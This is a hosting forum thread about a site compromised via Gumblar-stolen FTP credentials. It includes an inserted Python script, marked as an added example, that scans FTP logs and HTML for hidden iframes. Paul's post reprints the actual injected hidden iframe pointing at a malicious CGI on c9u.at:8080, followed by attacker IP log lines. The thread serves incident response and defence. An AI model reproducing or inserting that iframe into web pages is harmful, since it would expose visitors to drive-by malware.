Site Hacked after one day

My site has been hacked after only one day on your servers. This is unacceptable.

This is the response I get:

Praveenp: Iframe insertion can occur due to a code vulnerability.
Praveenp: Iframe injection normally happens via SQL injection, CMS editors with insecure uploaders, or remote include vulnerabilities.
Praveenp: Whenever there is iframe insertion, check your web and FTP logs.
Paul: Are you trying to tell me this is my problem?
Praveenp: If you need the web logs of your account, kindly let us know and we will provide them. It will help you to find the source of the insertion.

You are telling me this is my issue? The iframe was inserted into the body of a page, it has NOTHING to do with SQL or my code.

I'm not very happy. My account name is the same as my forum name. Please sort this out. This has never happened to me anywhere else, and my local machine is firewalled and anti-virused. No one has access to this machine or my FTP.
 
Do you have a ticket?

I checked your files and found nothing. I need a timestamp to match it up and tell you any more; with a timestamp we could tell you exactly how it happened.
 
I have opened a ticket - there is suspicious activity in the FTP logs from Poland. My machine is firewalled and has AV running, therefore I have no idea how they obtained the username and password. I am 99.9% sure it was not from this machine (the only machine ever used by me). None of the hosting accounts at the other hosts I use have been compromised (same CuteFTP used for all my hosting). Thanks for your help thus far.
 
p.s. I have already restored all files - the iframe code was:

<body><iframe src="http:// c9u.at :8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>

If you look at the FTP logs there should only ever be an IP from one geolocation (Here in SA) - it seems someone from Poland and Sweden logged in and edited files.
 
ex090816.log 30834 09:45:30 123.237.23.24 [682]created {removed} 426 995
ex090816.log 30753 09:44:45 89.215.17.239 [679]sent {removed} 226 0
ex090816.log 30786 09:45:01 82.79.225.215 [681]sent {removed} 226 0
ex090816.log 30875 09:45:56 217.209.169.85 [684]sent {removed} 226 0

These are a few of the culprits.
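The two things worth automating from the post above are the checks the support staff keep asking for: pull every FTP event whose client IP is not from the owner's usual network (and in particular the uploads, since in IIS FTP logs "created" is a write and "sent" is a download), and scan the restored pages for iframes that are hidden, tiny, or pointing at an odd port. The following is an added example, not code from the thread, the host, or Paul; the log lines and HTML are constructed samples in the same shape as the excerpt, the IPs are documentation ranges, the host example.invalid stands in for the real one, and the "owner network" 203.0.113.0/24 is an assumption in place of a real geolocation lookup.

```python
import ipaddress
import re
from html.parser import HTMLParser

# Constructed sample in the shape of the grep'd IIS FTP log excerpt above:
# file, line no., time, client IP, [session]verb, path, status, bytes.
# IPs are documentation ranges, not the real addresses from the thread.
FTP_LOG_SAMPLE = """\
ex090816.log 30701 09:12:03 203.0.113.45 [670]sent /index.html 226 0
ex090816.log 30753 09:44:45 198.51.100.22 [679]sent /index.html 226 0
ex090816.log 30786 09:45:01 198.51.100.22 [681]created /index.html 226 0
ex090816.log 30834 09:45:30 192.0.2.9 [682]created /about.html 426 995
ex090816.log 30875 09:45:56 203.0.113.45 [684]sent /about.html 226 0
"""

# Assumption: the owner only ever connects from this network (stand-in for
# "the one geolocation here in SA"); anything else is suspect.
OWNER_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

LOG_RE = re.compile(
    r"^(?P<file>\S+)\s+(?P<lineno>\d+)\s+(?P<time>\d\d:\d\d:\d\d)\s+"
    r"(?P<ip>[\d.]+)\s+\[(?P<session>\d+)\](?P<verb>\w+)\s+(?P<path>\S+)\s+"
    r"(?P<status>\d+)\s+(?P<bytes>\d+)$"
)


def parse_ftp_log(text):
    """Parse lines in the excerpt's format; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["ip"] = ipaddress.ip_address(ev["ip"])
            events.append(ev)
    return events


def flag_unexpected_ftp(text, networks=OWNER_NETWORKS, writes_only=False):
    """(ip, time, verb, path) for each event from outside the owner's networks.
    In IIS FTP logs 'sent' is a download to the client and 'created' is an
    upload, so writes_only=True isolates the file modifications themselves."""
    hits = []
    for ev in parse_ftp_log(text):
        if any(ev["ip"] in net for net in networks):
            continue
        if writes_only and ev["verb"] != "created":
            continue
        hits.append((str(ev["ip"]), ev["time"], ev["verb"], ev["path"]))
    return hits


# Constructed page: one legitimate embed plus an injected iframe shaped like
# the payload in the post (hidden, odd port, CGI with a tag parameter).
# example.invalid is a placeholder host, not the real one.
HTML_SAMPLE = """<html><body>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<p>Welcome</p>
<iframe src="http://example.invalid:8080/ts/in.cgi?x" width=125 height=125 style="visibility: hidden"></iframe>
</body></html>"""

PORT_RE = re.compile(r"^https?://[^/:]+:(\d+)(?:/|$)", re.I)


def _px(value):
    """Numeric pixel size, or None if absent/non-numeric."""
    m = re.match(r"^\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class HiddenIframeFinder(HTMLParser):
    """Collect (src, reasons) for iframes that look like injected ones."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        reasons = []
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via style")
        w, h = _px(a.get("width")), _px(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("1x1 or smaller")
        m = PORT_RE.match(a.get("src", ""))
        if m and m.group(1) not in ("80", "443"):
            reasons.append("non-standard port in src")
        if reasons:
            self.findings.append((a.get("src", ""), reasons))


def find_hidden_iframes(html):
    finder = HiddenIframeFinder()
    finder.feed(html)
    return finder.findings


if __name__ == "__main__":
    for hit in flag_unexpected_ftp(FTP_LOG_SAMPLE, writes_only=True):
        print("upload from outside owner network:", hit)
    for src, why in find_hidden_iframes(HTML_SAMPLE):
        print("suspicious iframe:", src, why)
```

Run it against the real log with the owner's own address range in OWNER_NETWORKS and the timestamps it prints are the ones support asks for; the "created" events are the moments the files were overwritten, and the matching "sent" events just before them show the attacker fetching the page first so the iframe could be spliced into the existing body.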
 
That doesn't mean much really. I need a TIMEstamp to tell you what/how; without it I can't do much.

The first thing you should do is check that you have all Adobe software updated to the latest versions:
http://support.jodohost.com/showthread.php?t=16921

I say this because the FTP logs we sent clearly show that as the method, not a server issue or site code problem, as the cause.

After you make sure Adobe apps are to the latest version, use the Hsphere CP and change the FTP password ASAP.
 
Yes I know and saw the logs.

This is exactly how the botnets that work from the Gumblar worm's stolen passwords operate. I have posted a large log like this in the past; trying to search it up.

OK, found it. It is in a section you don't have access to right now; send me a request to go to the customer-only forum (it is an announcement that should show at the top of each forum) and I will get you access. Basically it is a copy/paste of a log almost like yours, just with a bunch of IPs and filenames replaced (for a real-world example I just anonymized the client data).

I was just checking in here. I will be back around several times today and get you access one of those times. Sorry this has happened, but it looks like something easily resolvable.
 
Thank you, you have been a great help. I apologise for seeming rude, but when I saw that I had to re-upload after only one day I was mad as hell.

Thanks again - you have been a star. I will update my Adobe, but as far as I know it is said to auto-update.
Paul,

No offense taken at all; we have been dealing with these issues for several months now, along with all other hosts.

FTP access to edit files is really a staple; it is something we would take a lot of fire for turning off. And since they use valid login info, it is a large problem.

There is a chance, if you used the same login/password at the previous host (if there was one; I didn't look up the domain info), that it was 'stolen' as much as months before, as I have seen several of the FTP passwords stolen by Gumblar be used with quite a delay, while others are stolen and the botnet hounds sent out immediately.

If you look up many of these IPs, you will see most of them are trojaned home PCs as well :(